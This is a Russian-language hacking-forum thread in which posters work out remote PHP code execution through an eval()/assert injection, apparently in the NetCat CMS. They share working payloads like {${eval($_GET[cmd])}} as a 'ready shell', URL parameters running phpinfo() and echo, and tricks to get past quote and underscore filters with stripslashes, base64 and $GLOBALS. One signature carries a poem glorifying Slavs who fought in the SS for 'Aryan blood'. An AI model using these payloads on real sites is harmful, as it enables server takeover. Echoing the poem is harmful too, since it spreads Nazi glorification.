Можно попробовать:

Если _ тоже фильтруется, можно использовать PHP-функции для работы с массивами, наподобие end, restet, prev и использовать их по отношению к $GLOBALS или использовать функции(При фильтровании$), значение которых можно устанавливать самим, в названии которой не содержится фильтруемых символов, однако в зависимости от сборки таких может не быть.

UDP:

Для каждого отдельного случая нужно самостоятельно подбирать вариации кода.

Warning: assert() [function.assert]: Assertion failed in /var/www/...../www/netcat/require/s_list.inc.php(292) : eval()'d code on line 1

вот что выпало

Что мешает написать прямо так {${eval($_GET[cmd])}} .

Готовый шелл прямо

Можно еще загонять в base64, с его помощью можно передавать большие запросы не боясь фильтра кавычек!

как не странно, такой обрабатывает корректно. и пишет по вашему запросу ничего не найдено.

амперсанта фильтруется тоже.

когда вбиваешь {${print(2)}} он выводит 22

?action=index&text={${eval($_GET[cmd])}}&cmd=phpinfo();

как я понял у тебя MQ= on и ты сразу не можешь вставить код с кавычкой :

?action=index&text={${eval(stripslashes($_GET[cmd]))}}&cmd=echo 'fff';

__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

Долго думает потом опера выдаёт следующее:

Could not locate remote server

Check that the address is spelled correctly, or try searching for the site.